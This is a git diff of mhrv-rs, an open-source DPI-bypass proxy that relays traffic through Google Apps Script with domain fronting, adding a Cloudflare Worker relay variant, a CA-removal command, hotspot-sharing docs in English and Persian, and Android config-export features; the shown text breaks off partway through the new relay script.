"ecc8ac4bc1dc3381b7f59c34f00b67e18f910c2c0f50015669dde7def656a736" +dependencies = [ + "anyhow", + "id-arena", + "indexmap", + "log", + "semver", + "serde", + "serde_derive", + "serde_json", + "unicode-xid", + "wasmparser", +] + [[package]] name = "writeable" version = "0.6.3" diff --git a/Cargo.toml b/Cargo.toml index e7fdae86..7d7b3c02 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "mhrv-rs" -version = "1.6.0" +version = "1.9.2" edition = "2021" description = "Rust port of MasterHttpRelayVPN -- DPI bypass via Google Apps Script relay with domain fronting" license = "MIT" @@ -94,11 +94,15 @@ libc = "0.2" # traffic black-holes (symptom: Chrome shows DNS_PROBE_STARTED). [target.'cfg(target_os = "android")'.dependencies] jni = { version = "0.21", default-features = false } -tun2proxy = { version = "0.7", default-features = false } +tun2proxy = { version = "0.7", default-features = false, features = ["udpgw"] } [dev-dependencies] # Used in mitm tests to sanity-check the cert extensions we emit. x509-parser = "0.16" +# `test-util` enables `tokio::test(start_paused = true)` so timing- +# sensitive tests in `tunnel_client` (the empty-poll cadence) can +# auto-advance virtual time instead of burning real wall-clock seconds. +tokio = { version = "1", features = ["test-util"] } [profile.release] panic = "abort" diff --git a/README.md b/README.md index 938d10c1..b4a9980f 100644 --- a/README.md +++ b/README.md @@ -102,14 +102,16 @@ This part is unchanged from the original project. Follow @masterking32's guide o - Who has access: **Anyone** 6. Copy the **Deployment ID** (the long random string in the URL). +> **Alternative backend — Apps Script + Cloudflare Worker.** A variant in [`assets/apps_script/Code.cfw.gs`](assets/apps_script/Code.cfw.gs) + [`assets/cloudflare/worker.js`](assets/cloudflare/worker.js) turns Apps Script into a thin forwarder and offloads the actual fetch to a Cloudflare Worker you deploy. The win on day one is **latency** (~10-50 ms at the CF edge vs ~250-500 ms in Apps Script — visibly snappier for browsing and Telegram). It does **not** reduce your daily 20k Apps Script `UrlFetchApp` count, because today's mhrv-rs always sends single-URL relay requests; the batch path on the GAS+Worker side is wired and ready (`ceil(N/40)` quota per N-URL batch) but no shipping client emits it. Trade-offs: worse for YouTube long-form (30 s wall vs 6 min), no fix for Cloudflare anti-bot, **not compatible with `mode: "full"`** (no tunnel-ops support → won't help WhatsApp/messengers on Android full mode). Full setup and trade-off table in [`assets/cloudflare/README.md`](assets/cloudflare/README.md). mhrv-rs needs no config changes — same `mode: "apps_script"`, same `script_id`, same `auth_key`. + #### Can't reach `script.google.com` from your network? -If your ISP is already blocking Google Apps Script (or all of Google), you need Step 1's browser connection to succeed *before* you have a relay to use. `mhrv-rs` ships a small bootstrap mode for exactly this: `google_only`. +If your ISP is already blocking Google Apps Script (or all of Google), you need Step 1's browser connection to succeed *before* you have a relay to use. `mhrv-rs` ships a `direct` mode for exactly this — SNI-rewrite tunnel only, no Apps Script relay required. (Was named `google_only` before v1.9 — the old name is still accepted in config files.) 1. Build / download the binary as in Step 2 below. -2. Copy [`config.google-only.example.json`](config.google-only.example.json) to `config.json` — no `script_id`, no `auth_key` required. +2. Copy [`config.direct.example.json`](config.direct.example.json) to `config.json` — no `script_id`, no `auth_key` required. 3. Run `mhrv-rs serve` and set your browser's HTTP proxy to `127.0.0.1:8085`. -4. In `google_only` mode the proxy only relays `*.google.com`, `*.youtube.com`, and the other Google-edge hosts via the same SNI-rewrite tunnel the full client uses. Other traffic goes direct — no Apps Script relay exists yet. +4. In `direct` mode the proxy only routes `*.google.com`, `*.youtube.com`, and the other Google-edge hosts (plus any [`fronting_groups`](docs/fronting-groups.md) you've configured) via the SNI-rewrite tunnel. Other traffic goes raw — no Apps Script relay exists yet. 5. Do Step 1 in your browser (the connection to `script.google.com` will be SNI-fronted). Deploy Code.gs, copy the Deployment ID. 6. In the desktop UI or the Android app (or by editing `config.json`) switch the mode back to `apps_script`, paste the Deployment ID and your auth key, and restart. @@ -135,7 +137,7 @@ To route your browser's HTTPS traffic through the Apps Script relay, `mhrv-rs` h - A fresh CA keypair (`ca/ca.crt` + `ca/ca.key`) is generated **on your machine**, in your user-data dir. - The public `ca.crt` is added to your system trust store so browsers accept the per-site certificates `mhrv-rs` mints on the fly. This is the step that needs sudo / Administrator. - The private `ca.key` **never leaves your machine**. Nothing uploads it, nothing phones home, and no remote party — including the Apps Script relay — can use it to impersonate sites to you. -- You can revoke it at any time by deleting the CA from your OS keychain (macOS: Keychain Access → System → delete `mhrv-rs`) / Windows cert store / `/etc/ca-certificates`, and removing the `ca/` folder. +- You can revoke it at any time with `mhrv-rs --remove-cert` (or the **Remove CA** button in the UI) — it clears the CA from the OS trust store, verifies the revocation by name before touching disk, and deletes the on-disk `ca/` folder. NSS cleanup (Firefox profiles + Chrome/Chromium on Linux) is best-effort: if `certutil` from libnss3-tools isn't on PATH or a browser has the NSS DB locked, the tool logs a manual-cleanup hint. `config.json` and your Apps Script deployment are not touched, so regenerating the CA never requires redeploying `Code.gs`. Manual fallback: the certificate's Common Name is `MasterHttpRelayVPN` (not `mhrv-rs` — that's the app name, not the cert name). Delete by that CN in your OS keychain (macOS: Keychain Access → System → delete `MasterHttpRelayVPN`), Windows `certmgr.msc` → Trusted Root Certification Authorities, or `/usr/local/share/ca-certificates/MasterHttpRelayVPN.crt` + `sudo update-ca-certificates` on Linux; remove the `MasterHttpRelayVPN` entry from each browser's cert settings; and remove the `ca/` folder under the user-data dir. The launcher does all of this for you and then starts the UI: @@ -197,9 +199,14 @@ Then: ./mhrv-rs test # one-shot end-to-end probe ./mhrv-rs scan-ips # rank Google frontend IPs by latency ./mhrv-rs --install-cert # reinstall the MITM CA +./mhrv-rs --remove-cert # clean slate: uninstall + delete the whole ca/ dir ./mhrv-rs --help ``` +`--remove-cert` deletes the CA from the OS trust store, deletes the on-disk `ca/` directory, and verifies the revocation by name — if a system-level delete needed admin you didn't have, it aborts the file deletion and prints an error so you can re-run elevated. NSS cleanup (Firefox profiles + Chrome/Chromium on Linux) is best-effort: if `certutil` isn't on PATH or a browser holds the NSS DB open, the tool logs a manual-cleanup hint. Your `config.json` and the Apps Script deployment at `script.google.com` are untouched, so a fresh CA (generated next time you start the proxy) does not require redeploying `Code.gs`. + +> **Upgrading from pre-v1.2.11?** Earlier versions wrote a bare `user_pref("security.enterprise_roots.enabled", true);` into each Firefox profile's `user.js` without a provenance marker. `--remove-cert` intentionally does **not** strip that line — a bare pref is indistinguishable from one authored by the user or a corporate policy, and silently revoking trust behavior is worse than leaving one cosmetic orphan line. Firefox falls back to its built-in Mozilla root store the moment the MITM CA leaves the OS trust store, so this has no functional effect. Delete the line manually if it bothers you. + `script_id` can also be a JSON array: `["id1", "id2", "id3"]`. #### scan-ips configuration (optional) @@ -314,6 +321,26 @@ More deployments = more total concurrency = lower per-session latency. Each batc } ``` +## Sharing via hotspot (Android → iOS / laptop) + +The proxy listens on `0.0.0.0` by default, so any device on the same network can use it. This lets you share the tunnel from an Android phone to an iPhone, iPad, or laptop over hotspot: + +1. **Android**: enable mobile hotspot + start the app +2. **Other device**: connect to the Android hotspot WiFi +3. **Configure proxy** on the other device: + - **Server**: `192.168.43.1` (Android's default hotspot IP) + - **Port**: `8080` (HTTP) or `1081` (SOCKS5) + +### iOS setup +Settings → WiFi → tap (i) on the hotspot network → Configure Proxy → Manual → Server `192.168.43.1`, Port `8080`. + +For full device-wide coverage on iOS, use an app like [Shadowrocket](https://apps.apple.com/app/shadowrocket/id932747118) or [Potatso](https://apps.apple.com/app/potatso/id1239860606) — point it at the SOCKS5 proxy (`192.168.43.1:1081`) and it will route all traffic through the tunnel. + +### macOS / Windows +Set the system HTTP proxy to `192.168.43.1:8080` in network settings, or configure per-app SOCKS5 proxy to `192.168.43.1:1081`. + +> **Note**: if `listen_host` is set to `127.0.0.1` in your config, change it to `0.0.0.0` to allow connections from other devices. + ## Running on OpenWRT (or any musl distro) The `*-linux-musl-*` archives ship a fully static CLI that runs on OpenWRT, Alpine, and any libc-less Linux userland. Put the binary on the router and start it as a service: @@ -474,17 +501,21 @@ Donations cover hosting, self-hosted CI runner costs, and continued maintenance. > **نکته:** اگر نمی‌دانید رمز `AUTH_KEY` چه بگذارید، یک رشتهٔ تصادفی ۱۶ تا ۲۴ کاراکتری بسازید. مهم فقط این است که **دقیقاً همان رشته** را در برنامه هم وارد کنید. + + +> **پشتیبان جایگزین — `Apps Script` + `Cloudflare Worker`.** نسخه‌ای در [`assets/apps_script/Code.cfw.gs`](assets/apps_script/Code.cfw.gs) به‌همراه [`assets/cloudflare/worker.js`](assets/cloudflare/worker.js) وجود دارد که `Apps Script` را به یک رلهٔ نازک تبدیل می‌کند و کار `fetch` واقعی را به یک `Cloudflare Worker` که خودتان مستقر می‌کنید می‌سپارد. سود روز اول این کار **کاهش تأخیر** است (~۱۰ تا ۵۰ میلی‌ثانیه روی لبهٔ `CF` به جای ۲۵۰ تا ۵۰۰ میلی‌ثانیه روی `Apps Script` — برای مرور وب و تلگرام محسوس). سهمیهٔ روزانهٔ `UrlFetchApp` (~۲۰٬۰۰۰) را کاهش **نمی‌دهد**، چون امروز `mhrv-rs` همیشه درخواست تک‌آدرسی می‌فرستد؛ مسیر دسته‌ای روی `GAS+Worker` آماده و سیم‌کشی شده (`ceil(N/40)` سهمیه به‌ازای دستهٔ `N` آدرسی) ولی هیچ کلاینتی فعلاً آن را تولید نمی‌کند. مبادلات: ویدیوی طولانی یوتیوب بدتر می‌شود (دیوار ۳۰ ثانیه به جای ۶ دقیقه)، ضدبات `Cloudflare` را حل نمی‌کند، و **با `mode: "full"` سازگار نیست** (پشتیبانی از عملیات تونل ندارد → برای واتس‌اَپ و سایر مسنجرها روی اندرویدِ تونل کامل کمکی نمی‌کند). راهنمای کامل استقرار و جدول مبادلات در [`assets/cloudflare/README.fa.md`](assets/cloudflare/README.fa.md). در `mhrv-rs` هیچ تنظیمی تغییر نمی‌کند — همان `mode: "apps_script"`، همان `script_id`، همان `auth_key`. + #### به `script.google.com` هم دسترسی ندارید؟ -اگر `ISP` شما از قبل `Apps Script` (یا کل گوگل) را مسدود کرده، برای مرحلهٔ ۱ باید مرورگرتان **اول** به `script.google.com` برسد — قبل از اینکه رله‌ای داشته باشید. `mhrv-rs` یک حالت بوت‌استرپ کوچک دقیقاً برای همین دارد: `google_only`. +اگر `ISP` شما از قبل `Apps Script` (یا کل گوگل) را مسدود کرده، برای مرحلهٔ ۱ باید مرورگرتان **اول** به `script.google.com` برسد — قبل از اینکه رله‌ای داشته باشید. `mhrv-rs` یک حالت `direct` دقیقاً برای همین دارد — فقط تونل بازنویسی `SNI`، بدون نیاز به رلهٔ `Apps Script`. (قبل از v1.9 این حالت `google_only` نام داشت — نام قدیمی همچنان در فایل کانفیگ پذیرفته می‌شود.) ۱. برنامه را طبق مرحلهٔ ۲ پایین دانلود کنید -۲. فایل [`config.google-only.example.json`](config.google-only.example.json) را در کنار فایل اجرایی به نام `config.json` کپی کنید — نه `script_id` لازم دارد و نه `auth_key` +۲. فایل [`config.direct.example.json`](config.direct.example.json) را در کنار فایل اجرایی به نام `config.json` کپی کنید — نه `script_id` لازم دارد و نه `auth_key` ۳. برنامه را اجرا کنید و `HTTP proxy` مرورگرتان را روی `127.0.0.1:8085` تنظیم کنید -۴. در حالت `google_only`، پروکسی فقط `*.google.com`، `*.youtube.com` و بقیهٔ میزبان‌های لبهٔ گوگل را از طریق همان تونل بازنویسی `SNI` رد می‌کند. بقیهٔ ترافیک مستقیم می‌رود — هنوز رله‌ای در کار نیست +۴. در حالت `direct`، پروکسی فقط `*.google.com`، `*.youtube.com` و بقیهٔ میزبان‌های لبهٔ گوگل (به علاوهٔ هر [`fronting_groups`](docs/fronting-groups.md) که تنظیم کرده باشید) را از طریق تونل بازنویسی `SNI` رد می‌کند. بقیهٔ ترافیک مستقیم می‌رود — هنوز رله‌ای در کار نیست ۵. حالا مرحلهٔ ۱ را در مرورگر انجام دهید (اتصال به `script.google.com` با `SNI` فرونت می‌شود). `Code.gs` را مستقر کنید و `Deployment ID` را کپی کنید @@ -710,9 +741,15 @@ logread -e mhrv-rs -f **چطور گواهی را بعداً حذف کنم؟** -- **مک:** `Keychain Access` را باز کنید، در بخش `System` دنبال `mhrv-rs` بگردید و حذف کنید. سپس پوشهٔ `~/Library/Application Support/mhrv-rs/ca/` را پاک کنید -- **ویندوز:** `certmgr.msc` را اجرا کنید → `Trusted Root Certification Authorities` → `Certificates` → دنبال `mhrv-rs` بگردید و حذف کنید -- **لینوکس:** فایل `/usr/local/share/ca-certificates/mhrv-rs.crt` را حذف و `sudo update-ca-certificates` اجرا کنید +- **ساده‌ترین راه (هر سه سیستم‌عامل):** داخل برنامه روی دکمهٔ **`Remove CA`** بزنید، یا در ترمینال: + - مک/لینوکس: `sudo ./mhrv-rs --remove-cert` + - ویندوز (با `Run as administrator`): `mhrv-rs.exe --remove-cert` + - این دستور گواهی را از `trust store` سیستم و `NSS` (فایرفاکس/کروم) پاک می‌کند و فایل‌های `ca/ca.crt` و `ca/ca.key` را هم روی دیسک حذف می‌کند. فایل `config.json` و `deployment` آپس‌اسکریپت دست‌نخورده می‌مانند — پس لازم نیست `Code.gs` را دوباره دیپلوی کنید. +- **به‌صورت دستی** (اگر می‌خواهید): + - **نکته:** نام گواهی (`Common Name`) در همهٔ مکان‌ها `MasterHttpRelayVPN` است — `mhrv-rs` نام برنامه است، نه نام گواهی. + - **مک:** `Keychain Access` را باز کنید، در بخش `System` دنبال `MasterHttpRelayVPN` بگردید و حذف کنید. سپس پوشهٔ `~/Library/Application Support/mhrv-rs/ca/` را پاک کنید + - **ویندوز:** `certmgr.msc` را اجرا کنید → `Trusted Root Certification Authorities` → `Certificates` → دنبال `MasterHttpRelayVPN` بگردید و حذف کنید + - **لینوکس:** فایل `/usr/local/share/ca-certificates/MasterHttpRelayVPN.crt` را حذف و `sudo update-ca-certificates` اجرا کنید **چند `Deployment ID` لازم دارم؟** یکی برای استفادهٔ عادی کافی است. سهمیهٔ روزانه `UrlFetchApp` برای حساب رایگان گوگل **۲۰٬۰۰۰ درخواست در روز** است (برای `Workspace` پولی ۱۰۰٬۰۰۰)، با محدودیت پاسخ ۵۰ مگابایت به ازای هر `fetch`. از هر حساب گوگل **فقط یک `Deployment`** بسازید — سقف ۳۰ درخواست همزمان به ازای هر حساب است، پس چند `Deployment` روی یک حساب همزمانی اضافه نمی‌کند. برای افزایش همزمانی یا سهمیهٔ روزانه، در حساب‌های گوگل دیگر `Deployment` بسازید — هر حساب سهمیهٔ ۲۰ هزار درخواستی و ۳۰ اجرای همزمان خودش را دارد. همهٔ `ID`ها را در فیلد `Apps Script ID(s)` وارد کنید — برنامه خودکار بینشان می‌چرخد. مرجع: @@ -735,9 +772,12 @@ logread -e mhrv-rs -f ./mhrv-rs scan-ips # رتبه‌بندی IPهای گوگل بر اساس سرعت ./mhrv-rs test-sni # تست نام‌های SNI در pool ./mhrv-rs --install-cert # نصب مجدد گواهی +./mhrv-rs --remove-cert # حذف کامل گواهی: پاک‌سازی trust store و کل پوشهٔ ca/ ./mhrv-rs --help ``` +دستور `--remove-cert` گواهی را از `trust store` سیستم پاک می‌کند، با بررسی نام تأیید می‌کند که حذف انجام شده، و سپس پوشهٔ `ca/` روی دیسک را حذف می‌کند — اگر حذف نیاز به دسترسی ادمین داشته باشد که در دسترس نبوده، قبل از پاک کردن فایل‌ها متوقف می‌شود تا بتوانید با دسترسی مدیر دوباره اجرا کنید. پاک‌سازی `NSS` (فایرفاکس/کروم) `best-effort` است: اگر `certutil` نصب نباشد یا یکی از مرورگرها بازِ دیتابیس را قفل کرده باشد، ابزار پیغامی با راهنمای پاک‌سازی دستی نشان می‌دهد. فایل `config.json` شما و `deployment` آپس‌اسکریپت در `script.google.com` دست‌نخورده می‌مانند — یعنی وقتی در اجرای بعدی گواهی تازه تولید می‌شود، نیازی به دیپلوی مجدد `Code.gs` نیست. + **چرا گاهی جست‌وجوی گوگل بدون `JavaScript` نشان داده می‌شود؟** `Apps Script` مجبور است `User-Agent` درخواست‌های خود را روی `Google-Apps-Script` بگذارد. بعضی سایت‌ها این را به عنوان ربات شناسایی می‌کنند و نسخهٔ سادهٔ بدون `JavaScript` برمی‌گردانند. دامنه‌هایی که در لیست `SNI-rewrite` قرار گرفته‌اند (مثل `google.com`، `youtube.com`) از این مشکل در امان هستند چون مستقیماً از لبهٔ گوگل می‌آیند، نه از `Apps Script`. diff --git a/SF_README.md b/SF_README.md index 2648c790..a172fd8e 100644 --- a/SF_README.md +++ b/SF_README.md @@ -23,7 +23,7 @@ A free way to bypass internet censorship by routing your traffic through your ow **1. Set up the relay in your Google account (one-time).** Go to , sign in, click **New project**. Delete the sample code, paste in the [Code.gs file from this repo](assets/apps_script/Code.gs), change `AUTH_KEY = "..."` to a password only you know. Click **Deploy → New deployment → Web app**, set "Execute as: Me", "Who has access: Anyone". Copy the long ID from the URL — that's your **Deployment ID**. -> Can't reach `script.google.com` because it's blocked? Run mhrv-rs first in `google_only` mode (use [`config.google-only.example.json`](config.google-only.example.json)). It only relays Google sites and lets you reach the Apps Script editor through the bypass tunnel. Do step 1 in your browser, then switch back to normal mode. +> Can't reach `script.google.com` because it's blocked? Run mhrv-rs first in `direct` mode (use [`config.direct.example.json`](config.direct.example.json)). It only relays Google sites (plus any [fronting_groups](docs/fronting-groups.md) you've configured) and lets you reach the Apps Script editor through the bypass tunnel. Do step 1 in your browser, then switch back to normal mode. (`direct` was named `google_only` before v1.9 — the old name still works.) **2. Install and run mhrv-rs.** Download the package for your system from [Releases](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases/latest) and unzip it. @@ -94,7 +94,7 @@ This project is free and run by volunteers. If it helped you and you can spare a **۱. ساخت ریله در حساب گوگل (فقط یک بار).** به بروید، وارد حساب گوگل شوید و روی **New project** بزنید. کد پیش‌فرض را پاک کنید و محتوای [فایل Code.gs](assets/apps_script/Code.gs) همین مخزن را در آن جای‌گذاری کنید. خط `AUTH_KEY = "..."` را به یک رمز دلخواه که فقط خودتان می‌دانید تغییر دهید. سپس **Deploy → New deployment → Web app** را بزنید، گزینهٔ "Execute as: Me" و "Who has access: Anyone" را انتخاب کنید. آی‌دی طولانی توی URL را کپی کنید — این **Deployment ID** شماست. -> اگر `script.google.com` خودش بسته است، اول mhrv-rs را در حالت `google_only` اجرا کنید (از [`config.google-only.example.json`](config.google-only.example.json) استفاده کنید). این حالت فقط سایت‌های گوگل را تونل می‌کند تا بتوانید به ویرایشگر Apps Script برسید. مرحلهٔ ۱ را در مرورگر انجام دهید و بعد به حالت معمولی برگردید. +> اگر `script.google.com` خودش بسته است، اول mhrv-rs را در حالت `direct` اجرا کنید (از [`config.direct.example.json`](config.direct.example.json) استفاده کنید). این حالت فقط سایت‌های گوگل (به علاوهٔ هر [fronting_groups](docs/fronting-groups.md) که تنظیم کرده باشید) را تونل می‌کند تا بتوانید به ویرایشگر Apps Script برسید. مرحلهٔ ۱ را در مرورگر انجام دهید و بعد به حالت معمولی برگردید. (نام قبلی این حالت `google_only` بود — همچنان پذیرفته می‌شود.) **۲. نصب و اجرای mhrv-rs.** بستهٔ مخصوص سیستم خودتان را از [بخش Releases](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases/latest) دانلود کنید و از حالت فشرده در بیاورید. diff --git a/android/app/build.gradle.kts b/android/app/build.gradle.kts index 29671b31..2cb00e5f 100644 --- a/android/app/build.gradle.kts +++ b/android/app/build.gradle.kts @@ -14,8 +14,8 @@ android { applicationId = "com.therealaleph.mhrv" minSdk = 24 // Android 7.0 — covers 99%+ of live devices. targetSdk = 34 - versionCode = 139 - versionName = "1.6.0" + versionCode = 158 + versionName = "1.8.1" // Ship all four mainstream Android ABIs: // - arm64-v8a — 95%+ of real-world Android phones since 2019 @@ -136,6 +136,10 @@ dependencies { implementation("androidx.compose.material3:material3") implementation("androidx.compose.material:material-icons-extended") + // QR code generation + scanning (self-contained, no ML Kit needed). + implementation("com.google.zxing:core:3.5.3") + implementation("com.journeyapps:zxing-android-embedded:4.3.0") + debugImplementation("androidx.compose.ui:ui-tooling") debugImplementation("androidx.compose.ui:ui-test-manifest") } diff --git a/android/app/src/main/AndroidManifest.xml b/android/app/src/main/AndroidManifest.xml index dd2e94e8..4d74ca5c 100644 --- a/android/app/src/main/AndroidManifest.xml +++ b/android/app/src/main/AndroidManifest.xml @@ -53,8 +53,33 @@ + + + + + + + + + + + + + + + آدرس‌(های) Deployment یا Script ID + یک URL/ID، یا چند مورد با خط جدید/فاصله/ویرگول/نقطه‌ویرگول جدا کنید کلید احراز (auth_key) google_ip دامنهٔ فرانت @@ -52,7 +54,7 @@ تغییر زبان - URL کامل (https://script.google.com/macros/s/.../exec) یا فقط ID خام. چند ID به‌صورت چرخشی استفاده می‌شوند — بیشتر ID = سرعت بیشتر در حالت تونل کامل. + URL کامل (https://script.google.com/macros/s/.../exec) یا فقط ID خام. می‌توانید چند مورد را یک‌جا در فیلد افزودن جای‌گذاری کنید — با خط جدید/فاصله/ویرگول/نقطه‌ویرگول جدا می‌شوند. چند ID به‌صورت چرخشی استفاده می‌شوند — بیشتر ID = سرعت بیشتر در حالت تونل کامل. همان رمز مشترکی که داخل Apps Script گذاشتید. هنگام اتصال، مجوز VPN سیستم درخواست می‌شود. تمام ترافیک دستگاه به‌صورت خودکار رد می‌شود. بدون VPN سیستم. بعد از اتصال، پروکسی Wi-Fi را روی 127.0.0.1:%1$d (HTTP) یا %2$d (SOCKS5) تنظیم کنید. فقط برنامه‌هایی که تنظیمات پروکسی را رعایت می‌کنند رد می‌شوند. @@ -65,6 +67,8 @@ بررسی TLS طرف مقابل خاموش کردن، بررسی گواهی را برای لبهٔ گوگل غیرفعال می‌کند. فقط برای اشکال‌زدایی کاربرد دارد. + ارسال یوتیوب از طریق رله + ترافیک youtube.com / youtu.be / ytimg.com را به‌جای تونل SNI-rewrite از رلهٔ Apps Script عبور می‌دهد. حالت محدود را دور می‌زند ولی پخش ویدیو کندتر می‌شود. log_level parallel_relay: %1$d تعداد درخواست‌های موازی هر بار. ۱ عادی است؛ روی لینک‌های با افت، ۲-۳ را امتحان کنید. @@ -78,6 +82,7 @@ google_ip به %1$s به‌روزرسانی شد google_ip قبلاً به‌روز است (%1$s) خطای DNS — اتصال شبکه را بررسی کنید + لاگ‌ها در کلیپ‌بورد کپی شدند مصرف امروز (تخمینی) diff --git a/android/app/src/main/res/values/strings.xml b/android/app/src/main/res/values/strings.xml index 8aa47b4c..002f66e7 100644 --- a/android/app/src/main/res/values/strings.xml +++ b/android/app/src/main/res/values/strings.xml @@ -24,11 +24,13 @@ Test Add Clear + Copy Install Cancel Deployment URL(s) or script ID(s) + Paste one URL/ID, or many separated by newline / space / comma / semicolon auth_key google_ip front_domain @@ -52,7 +54,7 @@ Switch language - Full URLs (https://script.google.com/macros/s/.../exec) or bare IDs. Multiple IDs are rotated round-robin — more IDs = more pipeline throughput in full mode. + Full URLs (https://script.google.com/macros/s/.../exec) or bare IDs. Paste many at once into the Add field — they\'ll be split on newline / space / comma / semicolon. Multiple IDs are rotated round-robin — more IDs = more pipeline throughput in full mode. The shared secret you set in the Apps Script. Requests the OS VPN grant on Connect. All device traffic is routed automatically. No OS VPN. Set your Wi-Fi proxy to 127.0.0.1:%1$d (HTTP) or %2$d (SOCKS5) after Connect. Only apps that honour the proxy settings will tunnel. @@ -65,6 +67,8 @@ Verify upstream TLS Off disables cert checks for the Google edge. Only useful for debugging. + Send YouTube through relay + Route youtube.com / youtu.be / ytimg.com through Apps Script relay instead of SNI-rewrite tunnel. Avoids restricted mode but slower for video. log_level parallel_relay: %1$d Fan-out per request. 1 is normal; bump to 2-3 on lossy links. @@ -74,10 +78,26 @@ %1$d lines + + Paste config from clipboard + Export config + Show QR code + Scan QR code + Copy to clipboard + Config imported + Config copied to clipboard + Invalid config in clipboard + Export config + This includes your auth_key. Only share with people you trust. + Import config? + This will replace your current settings. + Camera permission needed to scan QR codes + google_ip updated to %1$s google_ip already current (%1$s) DNS lookup failed — check network + Logs copied to clipboard Usage today (estimated) diff --git a/android/app/src/main/res/xml/file_paths.xml b/android/app/src/main/res/xml/file_paths.xml new file mode 100644 index 00000000..1e63d103 --- /dev/null +++ b/android/app/src/main/res/xml/file_paths.xml @@ -0,0 +1,4 @@ + + + + diff --git a/assets/apps_script/Code.cfw.gs b/assets/apps_script/Code.cfw.gs new file mode 100644 index 00000000..f455fe20 --- /dev/null +++ b/assets/apps_script/Code.cfw.gs @@ -0,0 +1,360 @@ +/** + * DomainFront Relay — Apps Script with Cloudflare Worker exit. + * + * Variant of Code.gs that off-loads the actual outbound HTTP fetch to + * a Cloudflare Worker. Apps Script becomes a thin auth-and-forward + * relay; Cloudflare does the work and pays the latency. + * + * mhrv-rs ──► Apps Script (this file) ──► Cloudflare Worker ──► target + * ▲ inbound auth & batch ▲ outbound fetch + base64 + * + * Wire protocol with mhrv-rs is identical to Code.gs: + * 1. Single: POST { k, m, u, h, b, ct, r } → { s, h, b } + * 2. Batch: POST { k, q: [{m,u,h,b,ct,r}, ...] } → { q: [{s,h,b}, ...] } + * Both shapes are forwarded to the Worker as one POST per call + * from Apps Script: single mode posts {k, u, m, ...} once, batch + * mode posts {k, q: [...]} once. The Worker fans out batches + * internally via Promise.all. This is the design choice that + * makes Code.cfw.gs actually save GAS UrlFetchApp quota — without + * it we'd have to fetchAll(N worker calls) and end up at parity + * with the standard Code.gs. + * + * Trade-off summary (read before deploying): + * + Per-call latency drops from ~250-500 ms (Apps Script internal + * hop) to ~10-50 ms (CF edge). Visibly snappier for chat-style + * workloads (Telegram, page navigation). + * + Apps Script *runtime* quota (90 min/day on consumer accounts) + * stretches significantly because each call now spends almost all + * its time in the network leg to the Worker, not in the body + * fetch + base64 + header processing. + * + Apps Script *UrlFetchApp count* quota stretches roughly Nx for + * an N-URL batch because the batch is sent as a small number of + * POSTs to the Worker (one per chunk of WORKER_BATCH_CHUNK URLs), + * not fanned out per-URL via fetchAll. For mhrv-rs's typical + * 5-30 URL batches that's 1 GAS call (vs N under standard + * Code.gs). Single non-batched requests still count 1:1. + * - YouTube long-form streaming gets WORSE. Apps Script allows + * ~6 min wall per execution; CF Workers cap at 30 s wall. The + * SABR cliff hits sooner. For YouTube-heavy use, keep the + * standard Code.gs (apps_script mode). + * - Batch mode now has a per-batch wall, not per-URL: Promise.all + * resolves only when every fetch finishes, so the slowest URL + * dominates. mhrv-rs already retries failed batch items + * individually, so failure modes are graceful, but it's a real + * behavioural change vs Code.gs's per-URL fetchAll wall. + * - Cloudflare anti-bot challenges on destination sites can be + * stricter — exit IP is now in CF's own range, which CF's + * anti-bot fingerprints as a worker-internal request. This is + * a different problem than DPI bypass; not solved by either + * variant. + * + * Deployment: + * 1. Deploy assets/cloudflare/worker.js to Cloudflare Workers first + * (set its AUTH_KEY to a strong secret). + * 2. Note the *.workers.dev URL of that Worker. + * 3. Open https://script.google.com → New project, delete default code. + * 4. Paste THIS entire file. + * 5. Set AUTH_KEY (must match the Worker's AUTH_KEY and your mhrv-rs + * config's auth_key — all three identical). + * 6. Set WORKER_URL to your *.workers.dev URL (must include https://). + * 7. Deploy → New deployment → Web app + * Execute as: Me | Who has access: Anyone + * 8. Copy the Deployment ID into mhrv-rs config.json as "script_id". + * mhrv-rs does not need to know about Cloudflare; it talks to + * Apps Script the same way it always has. + * + * CHANGE THESE TWO CONSTANTS BELOW. + * + * Upstream credit for the GAS-→-Worker pattern: github.com/denuitt1/mhr-cfw. + * This file inherits the hardening (decoy-on-bad-auth, hop-loop guard) + * from the standard Code.gs. + */ + +const AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET"; + +// Full https://… URL of the Cloudflare Worker you deployed using +// assets/cloudflare/worker.js. Must include the scheme. +const WORKER_URL = "https://CHANGE_ME.workers.dev"; + +// ── Sentinels — DO NOT EDIT ───────────────────────────────── +// These two constants are NOT configuration. They are the literal +// template-default values used by the fail-closed check in doPost so +// that a forgotten edit (AUTH_KEY or WORKER_URL still set to the +// placeholder) returns a loud error instead of silently accepting the +// placeholder secret or POSTing to a bogus URL. Configure AUTH_KEY +// and WORKER_URL above; leave these alone. +const DEFAULT_AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET"; +const DEFAULT_WORKER_URL = "https://CHANGE_ME.workers.dev"; + +// Must match the Worker's MAX_BATCH_SIZE. Batches larger than this +// are split into chunks of this size and dispatched via fetchAll — +// each chunk costs 1 GAS UrlFetchApp call, so an N-URL batch costs +// ceil(N/CHUNK) calls (still much cheaper than the per-URL cost +// under standard Code.gs's fetchAll). +const WORKER_BATCH_CHUNK = 40; + +// Active-probing defense — same semantics as Code.gs. Bad-auth and +// malformed POST bodies receive a decoy HTML page that looks like a +// placeholder Apps Script web app instead of the JSON `{e}` error, +// so probes can't fingerprint the deployment as a relay endpoint. +// Flip to `true` only during initial setup if you need to debug an +// "unauthorized" loop, then flip back before sharing the deployment. +const DIAGNOSTIC_MODE = false; + +const SKIP_HEADERS = { + host: 1, connection: 1, "content-length": 1, + "transfer-encoding": 1, "proxy-connection": 1, "proxy-authorization": 1, + "priority": 1, te: 1, +}; + +const DECOY_HTML = + 'Web App' + + '

The script completed but did not return anything.

